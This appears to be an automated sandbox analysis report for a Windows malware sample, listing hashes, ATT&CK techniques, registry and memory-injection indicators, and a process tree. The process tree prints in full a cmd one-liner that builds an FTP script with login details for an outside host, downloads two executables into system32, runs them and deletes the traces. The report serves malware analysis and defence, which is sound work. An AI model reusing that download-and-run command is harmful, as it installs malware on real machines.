e14c582e968dcabd46a973be7a84a5ad6c0f7a2ae75b92f80093024b647a2eee

General

Target

d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
Size

44KB
MD5

d0310b6b7e678c1100131d32fdffdf3b
SHA1

901eabee57673826bdd5aa7f33973ab75831f33b
SHA256

e14c582e968dcabd46a973be7a84a5ad6c0f7a2ae75b92f80093024b647a2eee
SHA512

5932d020f1c7cdf18bea240cd92e4159a468591b34fd224fdd9ff77432f0a78f218737496f2d18aed2af3e5b1151f5da357a38939da1ba4377c5d13f2ad7f56d
SSDEEP

768:nomSbguls/uNvGFJw6SYx27CbuwayDh5aeRghbo7te5MpGM9SD8qlG5jpYgXShI1:no9bfl8AvG/JoeBayDkRace

Score

7^/10

discovery

Malware Config

Signatures

Deletes itself 1 IoCs

pid	Process
1768	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ftp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2160	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
2160	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
2160	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2160 wrote to memory of 2712	2160	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe	30
PID 2160 wrote to memory of 2712	2160	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe	30
PID 2160 wrote to memory of 2712	2160	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe	30
PID 2160 wrote to memory of 2712	2160	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe	30
PID 2712 wrote to memory of 2012	2712	Cmd.exe	32
PID 2712 wrote to memory of 2012	2712	Cmd.exe	32
PID 2712 wrote to memory of 2012	2712	Cmd.exe	32
PID 2712 wrote to memory of 2012	2712	Cmd.exe	32
PID 2160 wrote to memory of 1768	2160	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe	34
PID 2160 wrote to memory of 1768	2160	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe	34
PID 2160 wrote to memory of 1768	2160	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe	34
PID 2160 wrote to memory of 1768	2160	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe	34

C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2160
- C:\Windows\SysWOW64\Cmd.exe
  Cmd /c echo open laot.3322.org>>ftpdate.sys&echo ccc>>ftpdate.sys&echo 123>>ftpdate.sys&echo bin>>ftpdate.sys&echo get 360.exe %windir%\system32\Microsoft\360.exe>>ftpdate.sys&echo get XiaoMing.exe %windir%\system32\Microsoft\XiaoMing.exe>>ftpdate.sys&echo bye>>ftpdate.sys&ftp -s:ftpdate.sys&del ftpdate.sys&%windir%\system32\Microsoft\360.exe&%windir%\system32\Microsoft\XiaoMing.exe&Del %windir%\system32\Microsoft\360.exe&Del %windir%\system32\Microsoft\XiaoMing.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Windows\SysWOW64\ftp.exe
    ftp -s:ftpdate.sys
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Sc.bat""
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  PID:1768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Sc.bat

Filesize
210B

MD5
163f3ae3f34cca06baa478340b49025c

SHA1
7f8f173ed106a95b660969dd5c58ec2beb6ee67e

SHA256
fc7dfbf59f55d47bd388dbafe8e9014ef81401d9e03f7a6f442490a84cc1658d

SHA512
9eaa09842f86e49ee69a2b8e2861c5d373b83b90ecc2468922097db2520568f74e9b657c600c47e28d8c82fa192932f7acaf59979d73fb55cf67ac757c08a5e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ftpdate.sys

Filesize
152B

MD5
0fb17816f7c290e13419d68fa258edfa

SHA1
59b9dd4af7fa17ce896b878b55b07ddc4a7936f9

SHA256
bc1cdde48c4f9a1c95233092cc2ab3c33bec604b4164fa5ed4e6eae994fdbb9c

SHA512
5cd2261a9d7d201336a52eb8538d088289ea1161662fc796e47a8da23455218a2a52be004808756645fc59fd19341bd299a82be305f3ce774163192f4a25cc99

Download Submit
memory/2160-2-0x0000000004960000-0x00000000059C2000-memory.dmp

Filesize
16.4MB

Download
memory/2160-11-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/2160-32-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download

Analysis

Sharing